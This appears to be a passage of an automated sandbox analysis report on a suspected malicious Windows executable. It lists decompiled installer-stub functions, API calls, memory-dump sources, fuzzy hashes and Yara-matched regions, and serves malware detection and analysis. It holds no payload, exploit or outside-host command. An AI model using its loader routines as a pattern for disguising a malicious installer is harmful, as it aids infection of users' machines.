					do {
						_t34 = E00405E39(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AEB( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A6E( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653D(0x441000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                                                                                                                          0x004015c1
                                                                                                                                                                          0x004015c9
                                                                                                                                                                          0x004015cc
                                                                                                                                                                          0x004015d1
                                                                                                                                                                          0x004015d5
                                                                                                                                                                          0x004015d7
                                                                                                                                                                          0x004015df
                                                                                                                                                                          0x004015e1
                                                                                                                                                                          0x004015e4
                                                                                                                                                                          0x004015ea
                                                                                                                                                                          0x00401604
                                                                                                                                                                          0x00401607
                                                                                                                                                                          0x004015ec
                                                                                                                                                                          0x004015ec
                                                                                                                                                                          0x004015ef
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004015fa
                                                                                                                                                                          0x004015fd
                                                                                                                                                                          0x004015fd
                                                                                                                                                                          0x004015ef
                                                                                                                                                                          0x0040160e
                                                                                                                                                                          0x00401615
                                                                                                                                                                          0x00401624
                                                                                                                                                                          0x00401624
                                                                                                                                                                          0x00401617
                                                                                                                                                                          0x0040161a
                                                                                                                                                                          0x00401622
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00401622
                                                                                                                                                                          0x00401615
                                                                                                                                                                          0x00401627
                                                                                                                                                                          0x0040162b
                                                                                                                                                                          0x0040162c
                                                                                                                                                                          0x004015d7
                                                                                                                                                                          0x00401634
                                                                                                                                                                          0x00401663
                                                                                                                                                                          0x004022f1
                                                                                                                                                                          0x00401636
                                                                                                                                                                          0x00401638
                                                                                                                                                                          0x00401645
                                                                                                                                                                          0x0040164d
                                                                                                                                                                          0x00401655
                                                                                                                                                                          0x0040165b
                                                                                                                                                                          0x0040165b
                                                                                                                                                                          0x00401655
                                                                                                                                                                          0x00402c2d
                                                                                                                                                                          0x00402c39

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,74E5FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74E5FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                            • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                            • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                            • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1892508949-0
                                                                                                                                                                          • Opcode ID: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
                                                                                                                                                                          • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                                                                                                                          • Opcode Fuzzy Hash: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                          			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433eec =  *0x433eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
					}
				}
				return 0;
			}











                                                                                                                                                                          0x0040138a
                                                                                                                                                                          0x004013fa
                                                                                                                                                                          0x0040139b
                                                                                                                                                                          0x004013a0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004013a2
                                                                                                                                                                          0x004013a3
                                                                                                                                                                          0x004013ad
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00401404
                                                                                                                                                                          0x004013b0
                                                                                                                                                                          0x004013b7
                                                                                                                                                                          0x004013bd
                                                                                                                                                                          0x004013be
                                                                                                                                                                          0x004013c0
                                                                                                                                                                          0x004013c2
                                                                                                                                                                          0x004013b9
                                                                                                                                                                          0x004013b9
                                                                                                                                                                          0x004013ba
                                                                                                                                                                          0x004013ba
                                                                                                                                                                          0x004013c9
                                                                                                                                                                          0x004013cb
                                                                                                                                                                          0x004013f4
                                                                                                                                                                          0x004013f4
                                                                                                                                                                          0x004013c9
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                          • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                          • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                          • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                                                                                                                          • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                                                                                                                          • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00401EDE, Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$EnableShow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1136574915-0
                                                                                                                                                                          • Opcode ID: 17fdff3635e274bccff740d5b56a6ff11ee3748df7be710f89f234bf033d1564
                                                                                                                                                                          • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                                                                                                                          • Opcode Fuzzy Hash: 17fdff3635e274bccff740d5b56a6ff11ee3748df7be710f89f234bf033d1564
                                                                                                                                                                          • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040690A, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E0040690A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E0040689A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                                                                                          0x00406912
                                                                                                                                                                          0x00406915
                                                                                                                                                                          0x0040691c
                                                                                                                                                                          0x00406924
                                                                                                                                                                          0x00406930
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406937
                                                                                                                                                                          0x00406927
                                                                                                                                                                          0x0040692e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040693f
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                            • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                            • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                            • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                          • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                          • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                                                                                                                          • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                          • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040602D, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                          			E0040602D(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                                                                          0x00406031
                                                                                                                                                                          0x0040603e
                                                                                                                                                                          0x00406053
                                                                                                                                                                          0x00406059

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\GR8jRQeRUr.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                          • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                          • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                          • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                          • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00406008, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00406008(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                                                                                                                          0x0040600d
                                                                                                                                                                          0x00406013
                                                                                                                                                                          0x00406018
                                                                                                                                                                          0x00406021
                                                                                                                                                                          0x00406021
                                                                                                                                                                          0x0040602a

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                          • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                          • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                                                                                                                                          • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                          • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00405AEB, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00405AEB(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                                                                                          0x00405af1
                                                                                                                                                                          0x00405af9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405aff
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405AFF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                          • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                          • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                                                                                                                                          • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                          • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 029409CC, Relevance: 1.7, APIs: 1, Instructions: 230COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c27d7245d6f30405eebb0184cc7983fbd093de4ad3fb1ddaff820a3bb028667d
                                                                                                                                                                          • Instruction ID: de33681b2a4b926e74292abf2d061838627594be8c80371c14b755ce283f2dae
                                                                                                                                                                          • Opcode Fuzzy Hash: c27d7245d6f30405eebb0184cc7983fbd093de4ad3fb1ddaff820a3bb028667d
                                                                                                                                                                          • Instruction Fuzzy Hash: 3571BC715187898FCB2A9F38C8589E9BFB5FF53320F24199ECA958BA42CB314546CB41
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02948C80, Relevance: 1.6, APIs: 1, Instructions: 90libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,CE79F4FB,?,02947C4C), ref: 02949135
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                          • Opcode ID: 5e1e63e1e3ce519eeb933334d904034937c62fb8a79e634e98f9275d61854356
                                                                                                                                                                          • Instruction ID: 7a0298d3ed68a90f05653cb54aed2fb66d8801d88306b866e92be0fad6abd1bb
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e1e63e1e3ce519eeb933334d904034937c62fb8a79e634e98f9275d61854356
                                                                                                                                                                          • Instruction Fuzzy Hash: F331E9756053869FDB319F78C8957DA3BB2AF9A360FC44059DCC88B344DB318545CB16
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 02947AF2, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileA.KERNELBASE(?), ref: 02947AC8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                          • Opcode ID: 5bad9be666aa72c6b12b92a447766b5a2e54b5b856f0334277072d52a4163fa7
                                                                                                                                                                          • Instruction ID: 30228839ce9f7a97cb0b8cdebc3a0d72402b54eccac1bf382962bc3fb7c27904
                                                                                                                                                                          • Opcode Fuzzy Hash: 5bad9be666aa72c6b12b92a447766b5a2e54b5b856f0334277072d52a4163fa7
                                                                                                                                                                          • Instruction Fuzzy Hash: 7A0166B5908348DBCB289EB5C894ADEBBB5EF56210FC5422CC8954B646DB308A41CF51
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0294909F, Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,CE79F4FB,?,02947C4C), ref: 02949135
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                          • Opcode ID: 31067465c3f628db15891a3801e212162faa648fd29815438058bb5f56f487e8
                                                                                                                                                                          • Instruction ID: 2bc7bd049ad6e65a03e31352bfaa868c19c9e5d43f8d3c325eab99af0d4165a2
                                                                                                                                                                          • Opcode Fuzzy Hash: 31067465c3f628db15891a3801e212162faa648fd29815438058bb5f56f487e8
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E01B5B46002469FDB34AE78CC697DE37E2AF4A760FC4411AAC9CDB240DB31C5448F46
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004060DF, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E004060DF(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                                                          0x004060e3
                                                                                                                                                                          0x004060f3
                                                                                                                                                                          0x004060fb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406102
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406104

                                                                                                                                                                          APIs
                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
